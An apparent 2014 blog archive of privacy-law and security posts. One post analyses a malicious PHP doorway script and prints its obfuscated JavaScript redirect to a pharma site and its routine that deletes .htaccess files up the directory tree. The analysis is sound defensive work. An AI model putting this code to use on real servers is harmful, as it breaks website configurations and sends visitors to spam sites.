Monthly Archives: September 2014

Appeals Court Holds User Consent Required to Enforce Website Terms of Use

A recent decision by the United States Court of Appeals for the Ninth Circuit reinforces the importance, for website owners seeking to enforce their Terms of Use against consumers, of obtaining affirmative user consent to those terms. In Nguyen v. Barnes & Noble Inc., the Ninth Circuit held that Barnes & Noble’s website Terms of Use (“Terms”) were not enforceable against a consumer because the website failed to provide sufficient notice of the Terms, despite having placed conspicuous hyperlinks to the Terms throughout the website.

In Nguyen, the plaintiff filed a class action suit against Barnes & Noble for deceptive business practices and false advertising after the retailer cancelled the plaintiff’s online purchase. Barnes & Noble moved to compel arbitration, relying on a binding arbitration provision contained in the website’s Terms.

The Ninth Circuit refused to enforce the arbitration clause in the Terms, finding that the plaintiff had neither affirmatively assented to the Terms nor had constructive notice of them. Unlike “clickwrap” agreements that require users to affirmatively manifest assent (e.g., by clicking an “I agree” button), the Barnes & Noble Terms were presented in “browsewrap” form – no affirmative manifestation of assent was required for the plaintiff to complete the online transaction. The court also determined that placing hyperlinks to the Terms at the bottom of each page of the website, without providing further notice or prompting the user to take some additional action to show intent, did not provide sufficient notice of the Terms to make them enforceable against the plaintiff.

Read the full Client Alert on the Ninth Circuit’s decision.

Article 29 Working Party States Principles in EU Data Protection Law Apply to Big Data

On September 16, 2014, the Article 29 Working Party (the “Working Party”) adopted a Statement on the impact of the development of big data on the protection of individuals with regard to the processing of their personal data in the EU (“Statement”). This two-page Statement sets forth a number of “key messages” by the Working Party on how big data impacts compliance requirements with EU privacy law, with the principal message being that big data does not impact or change basic EU data protection requirements.

Noting that the real value of big data remains to be proven, the Working Party rejected the idea that the principles of purpose limitation and data minimization, or the requirements that data must be adequate, relevant and not excessive in relation to its purpose, might have to be reconsidered at this time in light of big data.

It also expressed opposition to calls for a “use model” or a model primarily focused on risk of harm.

Instead, while acknowledging the need for innovative thinking on how key data protection principles apply in the context of big data, the Working Party found “no reason to believe that the EU data protection principles are no longer valid and appropriate for the development of big data.” However, it left open the possibility of “further improvements to make [the principles] more effective in practice” in the context of big data.

Other “key messages” include:

  • The Working Party supports making big data benefits available to individuals and society.
  • Big data raises important social, legal and ethical questions, including privacy and data protection rights.
  • Privacy expectations of users must be met in the context of big data.
  • Upholding the purpose limitation is essential to preclude companies that have built monopolies and dominant positions from inhibiting market entry by others.
  • The Working Party has already provided guidance on numerous big data-related issues such as purpose limitation, anonymization, legitimate interest, and necessity and proportionality in law enforcement.
  • The Working Party will work with international regulators to ensure that EU data protection rules are appropriately applied to big data.
  • The Working Party understands the compliance challenges caused by the varying requirements in different jurisdictions.
  • International cooperation is needed to provide consistent guidance on operational and compliance questions as well as on joint enforcement of applicable rules.
  • EU data protection rights that are based on a fundamental right are subject only to limited exceptions under the law.

10 Things to Consider Before You Unblock a Website

Just recently, I was asked by a customer to provide some advice for their network administrators on unblocking sites. Sometimes you have to say no, but how do you decide which sites to give the green light? Here are some points to bear in mind...

  1. Have you looked at the whole site? There may be different content on some of the links.
  2. Is the domain a generic one? Maybe many sites are served from this domain. Can you limit the unblock to just one specific URL?
  3. Will the content change in future? If it is dynamic, what kind of content might be found there next week?
  4. Is there a better website people could visit for the same purpose? For example, there is little reason to unblock an image search engine other than Google Image Search, as an alternative engine may not support all the safety features enforced by Smoothwall.
  5. What’s the reason the site was blocked? If it is a misclassification, it should be reported to Smoothwall, and it will be fixed for everyone.
  6. Do you want to unblock just this website, or all websites of this type? Often it is better to adjust the categorisation (such as allowing all “sports” websites) rather than dealing with sites one at a time.
  7. Does it allow access to other pages surreptitiously, or draw content from other sites? Translation sites can cause this problem.
  8. You might understand the risks of this site, but do your users? Children, for example, may not easily be able to understand the risks of bullying or grooming on a social network, and less technical users might inadvertently leak sensitive information on file sharing sites.
  9. Are there any regulations or risk assessments you need to consider before unblocking this site?
  10. Does the site rely on third-party resources? You can use the advanced Policy Test Tool to examine these. Are those locations also safe with regard to points 1-9?
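Point 10 can be partially automated. As a rough illustration only (this is not the Policy Test Tool, and the function name is invented for this sketch), a few lines of JavaScript can list the third-party hosts a page pulls resources from, assuming you have the page's HTML in hand, so each host can then be checked against points 1-9:

```javascript
// Hypothetical helper: extract the external hostnames a page
// references via src/href attributes, so each third-party location
// can be vetted before the unblock goes through.
function thirdPartyHosts(html, ownHost) {
  const hosts = new Set();
  // Match src= / href= attributes pointing at absolute http(s) URLs.
  const re = /(?:src|href)\s*=\s*["']https?:\/\/([^\/"']+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const host = m[1].toLowerCase();
    if (host !== ownHost.toLowerCase()) hosts.add(host);
  }
  return [...hosts];
}
```

For example, a page on example.com embedding an image from cdn.example.net would report `['cdn.example.net']`; a real check would also follow redirects and script-injected resources, which a regex sketch like this cannot see.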


Article 29 Working Party Issues an Opinion on Internet of Things

On September 22, 2014, the Article 29 Working Party (the “Working Party”) released an Opinion on the Internet of Things (the “Opinion”), adopted during the Working Party’s September 2014 plenary session. With this Opinion, the Working Party intends to draw attention to the privacy and data protection challenges raised by the Internet of Things and to propose recommendations to help stakeholders comply with the current EU data protection legal framework.

In its Opinion, the Working Party specifically addresses (1) “wearable computing,” such as glasses and clothes that contain computers or sensors; (2) the “quantified self,” such as fitness devices carried by individuals who want to record information about their own habits and lifestyles; and (3) “domotics,” home devices that can be connected to the Internet, such as smart appliances. The Working Party considers these three recent developments to exemplify the current Internet of Things.

According to the Working Party, the main privacy, data protection and security issues currently raised by the Internet of Things are (1) the user’s lack of control over his or her data and information asymmetry; (2) the quality of the user’s consent; (3) the repurposing of original data processing; (4) intrusive profiling and behavioral analysis; (5) difficulties in ensuring anonymity; and (6) security risks.

The Opinion highlights the fact that the EU Data Protection Directive 95/46/EC on the protection of personal data and the e-Privacy Directive 2002/58/EC as amended in 2009 are fully applicable to the processing of personal data through different types of devices, applications and services used in the context of the Internet of Things.

The Opinion provides a comprehensive set of practical recommendations addressed to various stakeholders involved in the development of the Internet of Things (i.e., device manufacturers, application developers, social platforms, further data recipients, data platforms and standardization bodies) in order for them to develop a sustainable Internet of Things. The  recommendations are intended to assist with compliance with most of the obligations provided by the EU data protection legal framework (e.g., consent requirements, legal bases for processing personal data, data quality and data security, specific requirements for processing sensitive data, transparency requirements, the rights of the data subjects).

The Working Party will continue to monitor the developments of the Internet of Things and cooperate with other national and international regulators and lawmakers on these issues.

Software Security – Hackable Even When It’s Secure

On a recent call, one of the smartest technical folks I can name said something that made me reach for a notepad, to take the idea down for further development later. He was talking about why some of the systems enterprises believe are secure really aren't, even if they've managed to avoid some of the key issues.

Let me explain this a little deeper, because this thought merits such a discussion.

Think about what you go through if you're testing a web application. I can speak to this type of activity, since it was something I focused on for a significant portion of my professional career. Essentially, the whole problem comes down to defining what the word secure means. Many of the organizations I've first-hand witnessed stand up a software security program over the years follow the standard OWASP Top 10. It's relatively easy to understand, it's fairly well maintained, and it's relatively easy to test software against. It's hard to argue that the OWASP Top 10 hasn't become the de facto standard for determining whether a piece of software is secure or not.

Herein lies the problem. As many of you who do software security testing can attest, without at least a structured framework (aka a checklist) to test against, the testing process becomes never-ending. I don't know about you, but I've never had the luxury of taking all the time I needed; everything always needed to go live yesterday, and I or my team was always the speed bump on the way to production readiness. So we first settled on making sure none of the OWASP Top 10 were present in the software/applications we tested. Since this created an unmanageable number of bugs, we narrowed the scope down to just the OWASP Top 2: if we could eliminate injection and cross-site scripting, the applications would be significantly more secure, and everything would be better.
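For readers who haven't done this work, a purely illustrative sketch of what "eliminating the Top 2" means in practice (the function name is mine, not from any standard): XSS is killed by encoding untrusted output before it ever reaches HTML, and injection by the analogous move of keeping data out of the query channel via parameterized statements.

```javascript
// Illustrative anti-XSS output encoding: untrusted text is encoded
// so the browser can never interpret it as markup or script.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return untrusted.replace(/[&<>"']/g, c => map[c]);
}
```

The point of the rest of this post is that doing this everywhere, perfectly, still does not make the application secure.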

Then another issue arose. After all that testing and box-checking, when we were fairly sure the application didn't have remote file includes, cross-site scripting (XSS), SQL injection or any of that other critical stuff, we allowed the app to go live, and it quickly got hacked. The issue this caused for us was one not only of credibility, but also of confusion. How could the app not have any of those critical vulnerabilities but still get easily hacked?!

Now back to the issue at hand.

The fact is that even when you've managed to avoid all the common programming mistakes and well-known vulnerabilities, you can still produce a vulnerable application. Look at what eBay is going through right now. Even though there may not be any XSS or SQLi in their code, they still have issues allowing people to take over accounts. Why? Because there is more to securing an application than making sure there aren't any coding mistakes. Fully removing the OWASP Top 10 (good luck with that!) from all your code bases may make your applications safer than they are now - but it won't make them secure. And therein lies the problem.

When you hand your application over to someone who is going to test it for code issues like the OWASP Top 10, and only that, you're going to miss massive bugs that may still lurk in your code. Heartbleed, anyone? Maybe there is a logic flaw in your code. Maybe there is a procedural mistake that allows someone to bypass a critical security mechanism. Maybe you've forgotten to remove your QA testing user from your production code. The thing is, you may not actually know if you just test for app security issues with traditional or even emerging tools. Static analysis? Nope. Dynamic analysis? Nope. Manual code review? Maybe.
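To make the logic-flaw point concrete, here is a hypothetical checkout routine (the names and scenario are invented for illustration). There is no injection, no XSS, nothing a Top 10 checklist would flag, yet it is still exploitable, because nobody asked what a quantity should never be:

```javascript
// Hypothetical checkout logic: free of injection, XSS and the rest
// of the Top 10, yet exploitable through a pure business-logic flaw.
function computeTotal(cart) {
  let total = 0;
  for (const item of cart) {
    // BUG: quantity is never validated, so a crafted request with a
    // negative quantity reduces the total (or drives it negative).
    total += item.price * item.quantity;
  }
  return total;
}

// A version that encodes what the code should *never* do.
function computeTotalSafe(cart) {
  let total = 0;
  for (const item of cart) {
    if (!Number.isInteger(item.quantity) || item.quantity < 1) {
      throw new Error('invalid quantity');
    }
    total += item.price * item.quantity;
  }
  return total;
}
```

No scanner flags computeTotal, because nothing in it matches a known vulnerability pattern; only a tester reasoning about the application's intended behavior catches it.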

The ugly truth is that unless you have someone who not only understands what the code should do under normal conditions - but also what it should never do, you will continue to have applications with security issues. This is why automated scanners fail. This is why static analysis tools fail. This is why penetration testers can still fail - unless they're thinking outside the code and thinking in terms of application functionality and performance.

The reality is that for those applications that simply cannot be allowed to fail, you not only need to get them tested by some brilliant security and development minds, but also by someone who understands that beautiful combination of software development, security, and application business processes and design. Someone who looks at your application and says: "You know what would be interesting?"...

In my mind, this goes a long way toward explaining why there are so many failing software security programs out there in the enterprise. We seem to be checking all the right boxes, testing for all the right things, and still coming up short. Maybe it's because the structural integrity hasn't been validated by the demolitions expert.

Test your applications and software. Go beyond what everyone tells you to check, and look deep into the business processes to understand how entire mechanisms can be abused or bypassed entirely. That's how we're going to get a step closer to having safer, more secure code.

FTC Settles COPPA Violation Charges Against Yelp and TinyCo

On September 17, 2014, the Federal Trade Commission announced that the online review site Yelp, Inc., and mobile app developer TinyCo, Inc., have agreed to settle separate charges that they collected personal information from children without parental consent, in violation of the Children’s Online Privacy Protection Rule (the “COPPA Rule”).

Yelp

According to the FTC’s complaint against Yelp, from 2009 to 2013, Yelp app users had to provide information such as their name, email address, ZIP code and possibly date of birth and gender in connection with the app registration process. The FTC alleged that Yelp failed to implement a functional age-screening mechanism as part of the app registration process, thus allowing several thousand children who provided a date of birth indicating that they were under the age of 13 to register and gain full access to the Yelp online review service through the Yelp app and website. In addition, Yelp automatically collected information from Yelp app users’ phones, including unique identifiers associated with their mobile devices. The FTC alleged that because Yelp collected information from users whose self-declared birth date indicated that they were under the age of 13, Yelp was deemed to have “actual knowledge” under the COPPA Rule that it was collecting information from children. Yelp’s alleged conduct thus violated the COPPA Rule requirements that website operators notify parents and obtain their consent before collecting, using or disclosing personal information from children under 13 years of age.

Pursuant to the proposed settlement with the FTC, Yelp is required to pay a civil penalty of $450,000 and must delete information obtained from users who stated they were 13 years of age or younger at the time they registered for the Yelp App, unless Yelp can prove that the users actually were older than 13. Yelp also is required to comply with the COPPA Rule requirements in the future and must submit a detailed compliance report one year from the date when the court order is entered.

TinyCo

According to the FTC’s complaint, TinyCo offers free mobile apps for download and play, including “Tiny Pets,” “Tiny Zoo,” “Tiny Village,” “Tiny Monsters,” and “Mermaid Resort.” The FTC assessed various features (such as the themes appealing to children, animated characters and simple language) and determined that the apps were directed at children under 13. The FTC claimed that many of the apps included an optional feature that collected users’ email addresses. The FTC also claimed that TinyCo had received complaints from parents related to the apps and information collected from their children, but failed to take steps to verify whether TinyCo had collected information from the children. As in the Yelp action, the FTC alleged that TinyCo violated the COPPA Rule by failing to notify parents and obtain their consent before the company collected, used or disclosed personal information from children under 13 years of age.

Pursuant to the terms of the proposed settlement, TinyCo is required to pay a civil penalty of $300,000 and must delete information obtained from children under 13. TinyCo also is required to comply with the COPPA Rule requirements in the future and to submit a detailed compliance report one year from the date when the court order is entered.

A post on the FTC’s Business Center blog describing the settlement with Yelp identifies the following key takeaways:

  • companies should not disregard COPPA compliance just because they believe their business is not child-related;
  • companies need to appraise their apps in light of the privacy or security promises they make; and
  • companies need to pay attention to the information prospective customers are providing because “[a]n age-screening feature that doesn’t really screen for age can hardly be considered effective.”
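The last takeaway is worth making concrete. The sketch below is hypothetical (nothing here is the FTC's, Yelp's or TinyCo's code; the function names are invented): an age screen that actually screens uses the submitted birth date to gate registration, rather than collecting the date and proceeding anyway.

```javascript
// Hypothetical sketch of a *functional* age screen: the submitted
// date of birth actually drives the registration decision.
function isUnder13(dobIso, today) {
  const dob = new Date(dobIso);
  let age = today.getFullYear() - dob.getFullYear();
  const birthdayPassed =
    today.getMonth() > dob.getMonth() ||
    (today.getMonth() === dob.getMonth() && today.getDate() >= dob.getDate());
  if (!birthdayPassed) age -= 1;
  return age < 13;
}

function register(user, today = new Date()) {
  // COPPA: no collection from under-13 users without parental consent.
  if (isUnder13(user.dateOfBirth, today)) {
    return { ok: false, reason: 'parental consent required under COPPA' };
  }
  return { ok: true };
}
```

A real implementation would also need to avoid encouraging children to lie about their age (for example, by not revealing the cutoff), but the minimum bar the FTC describes is that the screen must have an effect at all.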

Article 29 Working Party to Establish a Common Approach on the Right to be Forgotten for All EU Data Protection Authorities

On September 18, 2014, the Article 29 Working Party (the “Working Party”) announced its decision to establish a common approach to the right to be forgotten (the “tool-box”). This tool-box will be used by all EU data protection authorities (“DPAs”) to help address complaints from search engine users whose requests to delist search results containing their personal data were refused by the search engines. The development of the tool-box follows the Working Party’s June 2014 meeting discussing the consequences of the European Court of Justice’s judgment in Costeja of May 13, 2014.

The Working Party reports that the DPAs have received numerous complaints from search engine users concerning the right to be forgotten, which demonstrates the need for such a tool-box.

As part of this “tool-box,” the Working Party intends to put in place a network of dedicated contact persons within the DPAs in order to develop common case-handling criteria for the complaints relating to the right to be forgotten. This network shall provide the DPAs with (1) a common record of decisions regarding the right to be forgotten, and (2) a dashboard to be used to identify the different types of complaints and highlight similarities.

The Working Party also announced that it will continue to analyze how search engines comply with the judgment.

On the same day, the European Commission published a factsheet on the Working Party’s website concerning the “myths” related to the right to be forgotten.

French Data Protection Authority Reviews 100 Websites During EU Cookies Sweep Day

On September 18, 2014, the French Data Protection Authority (the “CNIL”) announced plans to review 100 French websites on September 18-19, 2014. This review is being carried out in the context of the European “cookies sweep day” initiative, an EU online compliance audit. The Article 29 Working Party organized this joint action, which runs from September 15-19, 2014, to verify whether major EU websites are complying with EU cookie law requirements.

The eight EU data protection authorities (“DPAs”) that are taking part in this initiative are spending one or two days checking the most popular EU e-commerce and media websites.

In particular, the CNIL will examine:

  • The number and type of the cookies placed on the user’s computer;
  • The methods by which users are informed of cookies;
  • The visibility and the quality of the information provided to users;
  • How the site obtains user consent;
  • What happens if a user refuses the cookie; and
  • How long the website’s cookies remain on users’ computers.

The CNIL and other participating DPAs will use a common analysis grid when reviewing the sites.

The EU cookies sweep day is intended to provide the EU DPAs with an overview of existing cookie-related practices. Although the CNIL will not impose sanctions based on this review, it may impose sanctions following its planned inspections, which will begin in October 2014 and will verify compliance with the CNIL’s new guidance on the use of cookies.

UK ICO Launches Consultation on Criteria for Privacy Seal Schemes

On September 2, 2014, the UK Information Commissioner’s Office (“ICO”) published a consultation on the framework criteria for selecting scheme providers for its privacy seal scheme. The consultation gives organizations the opportunity to provide recommendations for the framework criteria that will be used to assess the relevant schemes. The consultation is open until October 3, 2014.

Under the draft framework criteria, the ICO’s proposals include the following:

  • The ICO endorses at least one scheme for a minimum of three years;
  • The ICO has the authority to revoke an endorsement of a scheme;
  • The scheme operator takes responsibility for the day-to-day operation of the scheme and retains ownership of the scheme (including the liabilities and indemnities that may be associated with the operation of the scheme); and
  • The scheme operator is the contact point for queries and complaints related to the scheme. Nevertheless, individuals may send complaints directly to the ICO if their concern relates to a breach of the Data Protection Act or the Privacy and Electronic Communications Regulations.

A scheme must first obtain accreditation from the United Kingdom Accreditation Service (“UKAS”), the national accreditation body for the UK, before it may gain the ICO’s endorsement. The ICO will participate in the UKAS accreditation process by offering technical expertise and advice to UKAS.

As detailed in its consultation document, the ICO is interested in receiving feedback on the roles and responsibilities of the ICO; the underlying principles; the scope, objectives and sustainability of the scheme; the certification process; and the quality criteria for organizations (i.e., relating to proficiency and knowledge).

The ICO hopes to select a proposal by early 2015 and aims to launch the first round of endorsed schemes in 2016.

Hunton Global Privacy Update – September 2014

On September 16, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program covered a number of privacy and data protection topics, including updates in the EU and Germany, highlights on the UK Information Commissioner’s Office annual report and an APEC update.

Listen to a recording of the September 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for November 18, 2014.

Most Contradictive Doorway Generator

Check out this thread on the WordPress.org forum. The topic starter found a suspicious PHP file and asked what it was doing.

The code analysis shows that it’s some sort of spammy doorway. But it’s a very strange doorway, and the way it works doesn’t make sense to me.

First of all, this script has a random text and code generator. The output it generates is [kind of] always unique. Here are a couple of output pages:

http://pastebin.com/ymwMZMWP
http://pastebin.com/Y6B7WM2T

...
<title>Is. Last spots brows: Dwelling. Immediately moral.</title>
</head>
<body>listend40721
<span>Flowerill merry chimes - has: Her - again spirits they, wooers. Delight preserve. For he. Free - snow set - grave lapped, icecold made myself visitings allow, beeves twas. Now one:
...

We usually see such random text when spammers want search engines to index “unique” content with the “right” keywords. But…

1. The script returns the page with a 404 Not Found code.

header("HTTP/1.1 404 Not Found");

so the page won’t be indexed by search engines.

2. The obfuscated JavaScript code at the bottom of the generated page redirects to a pharma site after about a second.

function falselye() {
    falselya = 29;
    falselyb = [148,134,139,129,140,148,75,145,140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,75,130,146,68,88];
    falselyc = "";
    for (falselyd = 0; falselyd < falselyb.length; falselyd++) {
        falselyc += String.fromCharCode(falselyb[falselyd] - falselya);
    }
    return falselyc;
}
setTimeout(falselye(), 1263);

Decoded:

window.top.location.href='hxxp://tabletmedicares .eu';
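The deobfuscation is trivial to reproduce: each number in falselyb is the target character's code shifted up by falselya (29). Note also that setTimeout is handed the string falselye() returns, which the browser then evaluates as code after 1,263 milliseconds. A sketch of the decoding step:

```javascript
// Reproduce the doorway script's decoder: subtract the key (29)
// from each number and join the resulting characters.
const falselya = 29;
const falselyb = [148,134,139,129,140,148,75,145,140,141,75,137,140,128,126,145,134,140,139,75,133,143,130,131,90,68,133,145,145,141,87,76,76,145,126,127,137,130,145,138,130,129,134,128,126,143,130,144,75,130,146,68,88];

const decoded = falselyb.map(n => String.fromCharCode(n - falselya)).join('');
// decoded is the redirect statement quoted (defanged) above.
```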

Update: on another site, the script redirected to hxxp://uanlwkis .com (also a pharma site), which had been registered only a few days earlier, on September 6, 2014.

But the generated text contains no pharma keywords, one more hint that it’s not meant for search engines. Maybe it’s an intermediary landing page for some email spam campaign that just needs to redirect visitors? I’ve seen many such landing pages on hacked sites, but in most cases they looked like the decoded version of the script: just redirection code. Indeed, why bother with a sophisticated random page generator if no one (neither humans nor robots) is going to read it?

3. There is also this strange piece of code:

$s = '/';
if (strtolower(substr(PHP_OS, 0, 3)) == 'win') $s = "\\\\";
// Collect the current directory and every directory above it.
$d = array(".$s");
$p = "";
for ($i = 1; $i < 255; $i++) {
    $p .= "..$s";
    if (is_dir($p)) {
        array_push($d, $p);
    } else {
        break;
    }
}
// In each collected directory, make the files writable and delete them.
foreach ($d as $p) {
    $a = "h"."tac"."c"."es"."s"; // concatenation hides the string "htaccess"
    $a1 = $p.".$a";              // .htaccess
    $a2 = $p.$a;                 // htaccess
    $a3 = $p."$a.txt";           // htaccess.txt
    @chmod($a1, 0666); @unlink($a1);
    @chmod($a2, 0666); @unlink($a2);
    @chmod($a3, 0666); @unlink($a3);
}

What it does is try to find and delete(!) all files named .htaccess, htaccess and htaccess.txt in the current directory and in all(!) directories above it.

That just doesn’t make sense. Why would it try to corrupt websites? I would understand if it only removed its own files and injected code into legitimate files, but it simply removes every .htaccess (and its typical backups) without checking what’s inside. That’s really disruptive and annoying behavior, given that many sites rely on the settings in .htaccess (e.g., most WordPress and Joomla sites).

It’s the most contradictive doorway generator I’ve ever seen. I can’t find any good explanation for why it does things the way it does. Maybe you have some ideas?


Vermont Attorney General Reaches Settlement with Aaron’s Franchisee Over Unlawful Debt Collection Practices

On September 8, Vermont Attorney General William Sorrell announced that SEI/Aaron’s, Inc. has entered into an assurance of discontinuance, which includes $51,000 in total fines, to settle charges over the company’s remote monitoring of its customers’ leased laptops. The settlement stems from charges accusing SEI/Aaron’s, an Atlanta-based franchise of the national rent-to-own retailer Aaron’s, Inc., of unlawfully using surveillance software on its leased laptops to assist the company in the collection of its customers’ overdue rental payments. The Vermont Office of the Attorney General claimed that such remote monitoring of the laptop users’ online activities in connection with debt collection constituted an unfair practice in violation of the Vermont Consumer Protection Act.

Under the settlement, the company agreed to pay a $45,000 civil penalty to the state of Vermont and $2,000 to each of the three Vermont consumers whose leased laptops were monitored by SEI/Aaron’s for allegedly unlawful purposes. The company also agreed to not install any monitoring software on its customers’ leased computers in connection with debt collection activities or in response to delinquent payments.

The Vermont Attorney General’s settlement with SEI/Aaron’s comes nearly a year after the company’s franchisor, Aaron’s Inc., reached a settlement with the FTC over charges that the franchisor knowingly played a vital role in its franchisees’ installation and use of surveillance software on rental computers to secretly monitor consumers.

Call for help: researching the recent gmail password leak

Hey folks,

You probably heard this week about the 5 million @gmail.com accounts that were posted online. I've been researching the list independently, and was hoping for some community help (this is completely unrelated to the fact that I work at Google - I just like passwords).

I'm reasonably sure that the released list is an amalgamation of a bunch of other lists and breaches. But I don't know which ones - that's what I'm trying to find out!

Which brings me to how you can help: I need people who can recognize which site their password came from. I'm trying to build a list of the breaches that were aggregated to create this one, in the hopes that I can find breaches that were previously unreported!

If you want to help:

      1. Check your email address on https://haveibeenpwned.com/
      2. If you're in the list, email ihazhacked@skullsecurity.org from the associated account
      3. I'll tell you the password that was associated with that account
      4. And, most importantly, you tell me which site you used that password on!

In a couple days/weeks (depending on how many responses I get), I'll release the list of providers!

Thanks! And, as a special 'thank you' to all of you, here are the aggregated passwords from the breach! And no, I'm not going to release (or keep) the email list. :)

Web Filtering Is Not Glamorous, but You May Still Make the Paper

What may be done at any time will be done at no time. 
  ~ Scottish Proverb

Procrastination seems to be built into human nature somehow; some problems become crises before being dealt with. In the beginning, most web content filtering problems are virtually unnoticeable. Maybe it’s because they always seem to start so small they’re nearly innocuous: a slip here, a slide there. And who really wants to deal with web filtering and make it a priority?

Web content filtering isn’t glamorous. Other issues feel more pressing, like network failures on testing days. Some issues are just more pleasant to deal with, like procuring new hardware. And let’s face it, students won’t sing your praises for bulletproofing your web filter. It is, however, necessary. Unlike rescheduled test days or network performance issues, a web filter failure will get your name in the paper.

Take Glen Ellyn Elementary District 41 near Chicago, Illinois. After a web filter failure there, in which fourth and fifth grade students were caught viewing pornography on the playground, parents combined forces to bring to light “other instances of inappropriate computer usage at district schools.” Altogether, the story originally broke in early May, but once on the press’s radar, continuing coverage of events became standard. The most recent update on Glen Ellyn was published in August.

Another example of this phenomenon happened in Forest Grove, Oregon. A student there was using her iPad to look at erotica through the literature curation website Wattpad. The story was a follow-up to an investigative piece by the local news that focused on students’ agility at circumventing filters.

And it isn’t just emergencies that get a school noticed for its web filtering policies. Apparently even overblocking of sites is newsworthy, as the Waseca County News indicated, on grounds that it is unfair. Sometimes the discussion even gets political, as it did in Woodbury, Connecticut, where a student doing research noticed that conservative-branded sites seemed to be blocked unevenly.

There are also probably more instances of web filtering gone bad that go unreported, but there’s really no way to tell how a filtering fumble will shake out before it hits the press. Of course, that raises the question: with so much at stake, why take the risk? Like laundry, dishes, or getting your oil changed, making sure your web filter is up to the challenge is only the first small step in making sure that your students are protected, but it’s an important one. Perhaps it’s time to schedule some time.

Discovery of 13-Year Hacking Scheme Highlights Questions About Cyber Insurance Coverage

Hunton & Williams Insurance Litigation & Counseling partner Lon Berk reports:

An Israeli security firm recently uncovered a hacking operation that had been active for more than a decade. Over that period, hackers breached government servers, banks and corporations in Germany, Switzerland and Austria by using over 800 phony front companies (which all had the same IP address) to deliver unique malware to victims’ systems. The hackers purchased digital security certificates for each phony company to make the sites appear legitimate to visitors. Data reportedly stolen included studies on biological warfare and nuclear physics, plans for key infrastructure, and bank account and credit card data.

The attack highlights concerns, not only about cybersecurity, but also about the extent to which such breaches are covered by specialty cyber insurance policies. These policies typically are written on a claims-made basis; that is, a policy responds to a claim made during its policy period. However, the policies also restrict coverage to events occurring on or after a “retroactive date.” Given that these types of breaches sometimes result from events stretching over years, even decades, and a breach may not be discovered for years, the retroactive date may limit the available coverage. If coverage for a loss related to a data breach is blocked by a cyber policy’s retroactive date, it may be necessary to look to standard general liability policies for coverage.
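The interaction of claims-made coverage and a retroactive date reduces to a simple predicate. A purely illustrative sketch (real policies turn on their specific wording, and the dates below are invented):

```python
from datetime import date

def claim_covered(event_date, claim_date,
                  policy_start, policy_end, retroactive_date):
    """Claims-made logic: the claim must fall within the policy period,
    AND the underlying event must fall on or after the retroactive date."""
    claim_in_period = policy_start <= claim_date <= policy_end
    event_on_or_after_retro = event_date >= retroactive_date
    return claim_in_period and event_on_or_after_retro

# A breach that began years before the retroactive date may be excluded
# even though it was only discovered (and claimed) during the policy period.
print(claim_covered(
    event_date=date(2001, 6, 1),        # intrusion began here
    claim_date=date(2014, 9, 1),        # discovered and claimed here
    policy_start=date(2014, 1, 1),
    policy_end=date(2014, 12, 31),
    retroactive_date=date(2012, 1, 1),
))  # False -- the retroactive date blocks coverage
```

This is exactly the gap a decade-long intrusion can fall into, and why general liability policies may need to pick up the slack.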

Mobile Apps Fail to Provide Basic Privacy Information According to GPEN’s Mobile Apps Sweep Results

On September 10, 2014, the Global Privacy Enforcement Network (“GPEN”) published the results of an enforcement sweep carried out in May of this year to assess mobile app compliance with data protection laws. Twenty-six data protection authorities worldwide evaluated 1,211 mobile apps and found that a large majority of the apps are accessing personal data without providing adequate information to users.

The results indicate that:

  • 85% of the mobile apps surveyed failed to provide clear information on how the apps collect, process and disclose user data;
  • In 59% of the cases, it was difficult to find information about privacy prior to installing the app;
  • 31% of the mobile apps appeared to request excessive access to personal data (e.g., geolocation data); and
  • 43% of the privacy notices were not tailored to the size of mobile device screens (e.g., the text is too small to read).

In light of these results, the data protection authorities that participated in the sweep are likely to launch enforcement actions in their jurisdictions. For instance, the Belgian data protection authority announced that it would contact certain stakeholders and, where severe breaches are identified, send cease and desist letters or notify other relevant enforcement authorities.

New Irish Data Protection Commissioner Appointed

On September 10, 2014, Helen Dixon was announced as the new Data Protection Commissioner for Ireland. Dixon currently is registrar of the Companies Registration Office and has experience in both the private and public sectors, including senior management roles in the Department of Jobs. Dixon will take up her appointment over the coming weeks, succeeding Billy Hawkes in the role. Hawkes has served as Commissioner for two terms since 2005.

Article 29 Working Party Releases Statement on ECJ Ruling Invalidating the EU Data Retention Directive

The Article 29 Working Party (the “Working Party”) recently released its August 1, 2014 statement providing recommendations on the actions that EU Member States should take in light of the European Court of Justice’s April 8, 2014 ruling invalidating the EU Data Retention Directive (the “Ruling”).

In particular, the Working Party’s statement provides recommendations on:

  • Ensuring that the relevant retained data are differentiated and limited to what is strictly necessary for the purpose of fighting “serious crime” (i.e., no automatic bulk retention of all categories of data);
  • Restricting government access to what is strictly necessary in terms of categories of data and data subjects, and also implementing substantive and procedural conditions for such access; and,
  • Ensuring effective protection against unlawful access and abuse (e.g., by allowing an independent authority to assess compliance with EU data protection laws).

The Working Party’s statement also emphasizes that the Ruling does not directly affect the validity of existing national data retention measures. Accordingly, the Working Party urges the European Commission to provide guidance on how the Ruling should be interpreted at the European and Member State levels.

Managing Security in a Highly Decentralized Business Model

Information Security leadership has been, and will likely continue to be, part politicking, part sales, part marketing, and part security. As anyone who has been a security leader or CISO can attest, issuing edicts to the business is as easy as it is fruitless; getting positive results in all but the most strictly regulated environments is nearly impossible. In highly centralized organizations, at least, the CISO stands a chance, since the organization likely has common goals, processes, and capital spending models. When you get to an organization that operates in a highly distributed and decentralized manner, the task of keeping pace on security grows to epic proportions.

As I was performing a recent ISO 27002 controls audit against one of these highly decentralized organizations, the magnitude of their challenge really hit me. While the specific industry isn't relevant to this example, I can simply say that they are in the business of making, testing and selling stuff. Parts of their business make things. Parts of their business test things. And parts of their business sell the things the other parts make and test, for various use cases. Some of the business is heavily regulated. Some of the business isn't regulated at all. All of the enterprise is connected via a single network, with centralized IT services, applications and management. I could stop right here and you'd understand why a universally applicable security program is nearly impossible here.


Bad Math

